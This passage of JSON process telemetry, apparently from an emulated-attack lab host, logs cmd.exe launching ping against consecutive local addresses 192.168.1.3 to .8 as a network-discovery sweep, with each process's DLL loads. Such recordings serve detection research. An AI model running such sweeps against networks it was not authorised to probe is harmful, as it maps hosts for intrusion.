"logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3500, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572003750000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010CA705101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3500, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572003700016, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010CA705101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3500, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572003700016, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010CA705101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3500, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572003700016, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010CA705101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3500, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572003700016, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010CA705101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3500, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572003700016, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010CA705101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3500, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572003700016, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010CA705101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3500, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572003700016, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010CA705101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3500, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572003700016, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010CA705101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3500, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572003700016, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010CA705101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3500, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572003700016, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010CA705101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3500, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572003860000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010CA705101}" - }, - { - "event_type": "process", - "pid": 3500, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572004170000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010CA705101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.3", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1480, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572004310000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010C1735101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 1480, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572004170000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010C1735101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1480, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572004170000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010C1735101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1480, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572004330000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010C1735101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1480, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572004330000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010C1735101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1480, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572004330000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010C1735101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1480, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572004330000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010C1735101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1480, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572004330000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010C1735101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 1480, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572004330000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010C1735101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 1480, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572004330000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010C1735101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 1480, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572004330000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010C1735101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 1480, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572004330000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010C1735101}" - }, - { - "event_type": "process", - "pid": 1480, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572004640000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010C1735101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.4", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 996, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572004870000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010B8765101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 996, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572004800000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010B8765101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 996, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572004800000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010B8765101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 996, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572004800000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010B8765101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 996, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572004800000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010B8765101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 996, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572004800000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010B8765101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 996, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572004800000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010B8765101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 996, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572004800000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010B8765101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 996, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572004800000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010B8765101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 996, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572004960000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010B8765101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 996, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572004960000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010B8765101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 996, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572004960000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010B8765101}" - }, - { - "event_type": "process", - "pid": 996, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572006840000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010B8765101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.5", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3004, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572006980000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-001027795101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3004, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572006990000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-001027795101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3004, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572006990000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-001027795101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3004, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572006990000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-001027795101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3004, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572006990000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-001027795101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3004, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572006990000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-001027795101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3004, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572006990000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-001027795101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3004, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572006990000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-001027795101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3004, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572006990000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-001027795101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3004, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572006990000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-001027795101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3004, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572006990000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-001027795101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3004, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572006990000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-001027795101}" - }, - { - "event_type": "process", - "pid": 3004, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572011840000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-001027795101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.6", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4736, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572011980000, - "unique_pid": "{42FC7E13-CB51-5C05-0000-0010947B5101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4736, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572011990000, - "unique_pid": "{42FC7E13-CB51-5C05-0000-0010947B5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4736, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572011990000, - "unique_pid": "{42FC7E13-CB51-5C05-0000-0010947B5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4736, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572011990000, - "unique_pid": "{42FC7E13-CB51-5C05-0000-0010947B5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4736, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572011990000, - "unique_pid": "{42FC7E13-CB51-5C05-0000-0010947B5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4736, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572011990000, - "unique_pid": "{42FC7E13-CB51-5C05-0000-0010947B5101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4736, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572011990000, - "unique_pid": "{42FC7E13-CB51-5C05-0000-0010947B5101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4736, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572011990000, - "unique_pid": "{42FC7E13-CB51-5C05-0000-0010947B5101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4736, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572011990000, - "unique_pid": "{42FC7E13-CB51-5C05-0000-0010947B5101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4736, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572011990000, - "unique_pid": "{42FC7E13-CB51-5C05-0000-0010947B5101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4736, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572011990000, - "unique_pid": "{42FC7E13-CB51-5C05-0000-0010947B5101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4736, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572011990000, - "unique_pid": "{42FC7E13-CB51-5C05-0000-0010947B5101}" - }, - { - "event_type": "process", - "pid": 4736, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572016840000, - "unique_pid": "{42FC7E13-CB51-5C05-0000-0010947B5101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.7", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7988, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572016980000, - "unique_pid": "{42FC7E13-CB51-5C05-0000-0010287E5101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572016980000, - "unique_pid": "{42FC7E13-CB51-5C05-0000-0010287E5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572016980000, - "unique_pid": "{42FC7E13-CB51-5C05-0000-0010287E5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572016980000, - "unique_pid": "{42FC7E13-CB51-5C05-0000-0010287E5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572016980000, - "unique_pid": "{42FC7E13-CB51-5C05-0000-0010287E5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572016980000, - "unique_pid": "{42FC7E13-CB51-5C05-0000-0010287E5101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572016980000, - "unique_pid": "{42FC7E13-CB51-5C05-0000-0010287E5101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572016980000, - "unique_pid": "{42FC7E13-CB51-5C05-0000-0010287E5101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572016980000, - "unique_pid": "{42FC7E13-CB51-5C05-0000-0010287E5101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572016980000, - "unique_pid": "{42FC7E13-CB51-5C05-0000-0010287E5101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572016980000, - "unique_pid": "{42FC7E13-CB51-5C05-0000-0010287E5101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572016980000, - "unique_pid": "{42FC7E13-CB51-5C05-0000-0010287E5101}" - }, - { - "event_type": "process", - "pid": 7988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572021990000, - "unique_pid": "{42FC7E13-CB51-5C05-0000-0010287E5101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.8", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4412, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572022140000, - "unique_pid": "{42FC7E13-CB52-5C05-0000-001097805101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4412, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572022140000, - "unique_pid": "{42FC7E13-CB52-5C05-0000-001097805101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4412, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572022140000, - "unique_pid": "{42FC7E13-CB52-5C05-0000-001097805101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4412, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572022140000, - "unique_pid": "{42FC7E13-CB52-5C05-0000-001097805101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4412, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572022140000, - "unique_pid": "{42FC7E13-CB52-5C05-0000-001097805101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4412, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572022140000, - "unique_pid": "{42FC7E13-CB52-5C05-0000-001097805101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4412, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572022140000, - "unique_pid": "{42FC7E13-CB52-5C05-0000-001097805101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4412, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572022140000, - "unique_pid": "{42FC7E13-CB52-5C05-0000-001097805101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4412, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572022140000, - "unique_pid": "{42FC7E13-CB52-5C05-0000-001097805101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4412, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572022140000, - "unique_pid": "{42FC7E13-CB52-5C05-0000-001097805101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4412, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - 